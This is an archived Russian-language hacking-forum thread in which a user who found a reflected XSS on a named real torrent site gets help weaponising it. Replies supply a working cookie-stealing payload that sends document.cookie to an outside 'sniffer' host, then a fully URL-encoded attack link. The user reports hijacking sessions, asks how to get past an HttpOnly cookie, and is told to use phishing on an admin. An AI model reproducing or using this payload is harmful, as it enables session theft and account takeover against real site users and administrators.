PDA

Просмотр полной версии : нашол такую хсс


Octavian
16.08.2015, 13:04
нашол такую хсс при нажатие в правом углу на закрытие появляется алерт

http://www.torrentsmd.com/smilies_popup.php?text=3&container='+alert(+document.cookie)+'&lang=ro (http://www.torrentsmd.com/smilies_popup.php?text=3&container=%27%2Balert(+document.cookie)%2B%27&lang=ro)

где типерь запихнуть сылку сниффера помоги пожалуста

http://hacker-lab.com/sniffer/images/251095_3.jpg

Octavian
16.08.2015, 13:07
Неудаляите пожалуста тему а то надаело мучятся

hahanovB
16.08.2015, 14:25
↑ (https://antichat.live/posts/3880737/)
Неудаляите пожалуста тему а то надаело мучятся


У тебя пассивка ищи активку и тогда сможешь запихнуть сниффер...

Подробнее: тут (https://antichat.live/threads/20140/)

faza02
16.08.2015, 17:29
↑ (https://antichat.live/posts/3880773/)
У тебя пассивка ищи активку и тогда сможешь запихнуть сниффер...
Подробнее:
тут (https://antichat.live/threads/20140/)


какая разница? JS все равно, разница в том, что пользователю нужно сделать доп. действие.


↑ (https://antichat.live/posts/3880732/)
нашол такую хсс при нажатие в правом углу на закрытие появляется алерт
http://www.torrentsmd.com/smilies_popup.php?text=3&container='+alert(+document.cookie)+'&lang=ro (http://www.torrentsmd.com/smilies_popup.php?text=3&container=%27%2Balert(+document.cookie)%2B%27&lang=ro)
где типерь запихнуть сылку сниффера помоги пожалуста
//hacker-lab.com/sniffer/images/251095_3.jpg (http://hacker-lab.com/sniffer/images/251095_3.jpg)



такого рода код:

'+((new Image()).src='//hacker-lab.com/sniffer/images/251095_3.jpg'+document.cookie)+'

не забудьте про URLEncode, плюсы в %2b, пробелы в +

Octavian
16.08.2015, 19:44
↑ (https://antichat.live/posts/3880845/)
какая разница? JS все равно, разница в том, что пользователю нужно сделать доп. действие.
такого рода код:
'+((new Image()).src='//hacker-lab.com/sniffer/images/251095_3.jpg'+document.cookie)+'
не забудьте про URLEncode, плюсы в %2b, пробелы в +


Друг можно всю сылку и чтоб провериная была о то многие типа помоглали но ничево на снифере неприходило,спасибо

Octavian
16.08.2015, 19:46
жутко пишу по русски прошу прощения ето не мои язык

Octavian
16.08.2015, 19:49
↑ (https://antichat.live/posts/3880845/)
какая разница? JS все равно, разница в том, что пользователю нужно сделать доп. действие.
такого рода код:
'+((new Image()).src='//hacker-lab.com/sniffer/images/251095_3.jpg'+document.cookie)+'
не забудьте про URLEncode, плюсы в %2b, пробелы в +



http://www.torrentsmd.com/smilies_popup.php?text=3&container='+((new Image()).src='//hacker-lab.com/sniffer/images/251095_3.jpg'+document.cookie)+'&lang=ro

нехочет так

funny_kaplan
16.08.2015, 20:42
↑ (https://antichat.live/posts/3880895/)
http://www.torrentsmd.com/smilies_popup.php?text=3&container='+((new
Image()).src='//hacker-lab.com/sniffer/images/251095_3.jpg'+document.cookie)+'&lang=ro
нехочет так


тогда так:


www.torrentsmd.com/smilies_popup.php?text=3&container=%27%2B%28%28new%20Image%28%29%29.src=%27//hacker-lab.com/sniffer/images/251095_3.jpg?%27%2Bdocument.cookie%29%2B%27&lang=ro (http://www.torrentsmd.com/smilies_popup.php?text=3&container=%27%2B%28%28new%20Image%28%29%29.src=%27//hacker-lab.com/sniffer/images/251095_3.jpg?%27%2Bdocument.cookie%29%2B%27&lang=ro)

Octavian
17.08.2015, 16:19
↑ (https://antichat.live/posts/3880924/)
тогда так:



друзя очередная непонятное проблема,спомошю сылке ворую сесию она ворует все значение кроме kogaionon_data а без нео никак

нехочет пропустить в акаунт даже если остальные значение от акаутнта(1) а значение kogaionon_data ставлю от акаунта(2) меня

прапускает в акаунт(2),выходит что астальные значение неважно от каково акаунта,и почему kogaionon_data неворуется помогите ето моя первая хсс

http://incomas.md/shop/2015.jpg

Octavian
17.08.2015, 16:20
друзя очередная непонятное проблема,спомошю сылке ворую сесию она ворует все значение кроме kogaionon_data а без нео никак

нехочет пропустить в акаунт даже если остальные значение от акаутнта(1) а значение kogaionon_data ставлю от акаунта(2) меня

прапускает в акаунт(2),выходит что астальные значение неважно от каково акаунта,и почему kogaionon_data неворуется помогите ето моя первая хсс

http://incomas.md/shop/2015.jpg

Octavian
17.08.2015, 16:30
↑ (https://antichat.live/posts/3880845/)
какая разница? JS все равно, разница в том, что пользователю нужно сделать доп. действие.
такого рода код:
'+((new Image()).src='//hacker-lab.com/sniffer/images/251095_3.jpg'+document.cookie)+'
не забудьте про URLEncode, плюсы в %2b, пробелы в +


очередная непонятное проблема,спомошю сылке ворую сесию она ворует все значение кроме kogaionon_data а без нео никак

нехочет пропустить в акаунт даже если остальные значение от акаутнта(1) а значение kogaionon_data ставлю от акаунта(2) меня

прапускает в акаунт(2),выходит что астальные значение неважно от каково акаунта,и почему kogaionon_data неворуется помогите ето моя первая хсс

http://incomas.md/shop/2015.jpg

grimnir
17.08.2015, 17:05
↑ (https://antichat.live/posts/3881253/)
очередная непонятное проблема,спомошю сылке ворую сесию она ворует все значение кроме kogaionon_data а без нео никак
нехочет пропустить в акаунт даже если остальные значение от акаутнта(1) а значение kogaionon_data ставлю от акаунта(2) меня
прапускает в акаунт(2),выходит что астальные значение неважно от каково акаунта,и почему kogaionon_data неворуется помогите ето моя первая хсс
http://incomas.md/shop/2015.jpg


https://www.owasp.org/index.php/HttpOnly

Octavian
17.08.2015, 17:19
↑ (https://antichat.live/posts/3881272/)
https://www.owasp.org/index.php/HttpOnly


na ruskom netu? i shto ea doljen poniati?

funny_kaplan
17.08.2015, 17:29
↑ (https://antichat.live/posts/3881281/)
na ruskom netu? i shto ea doljen poniati?


Невозможно получить значение kogaionon_data, потому что javascript не имеет доступа к кукам, которые имеют флаг HttpOnly(передаётся в заголовках браузеру, но JS-ом их не выцепить)

Юзай фишинг.

Octavian
17.08.2015, 17:33
↑ (https://antichat.live/posts/3881285/)
Невозможно получить значение kogaionon_data, потому что javascript не имеет доступа к кукам, которые имеют флаг HttpOnly(передаётся в заголовках браузеру, но JS-ом их не выцепить)
Юзай фишинг.


nikokovo tolka ot etoi xss? da kakoi normalinii admin povedeotsea na fhising *

Octavian
17.08.2015, 21:33
да дело в HttpOnly (https://www.owasp.org/index.php/HttpOnly) ево никак обоити невозможно?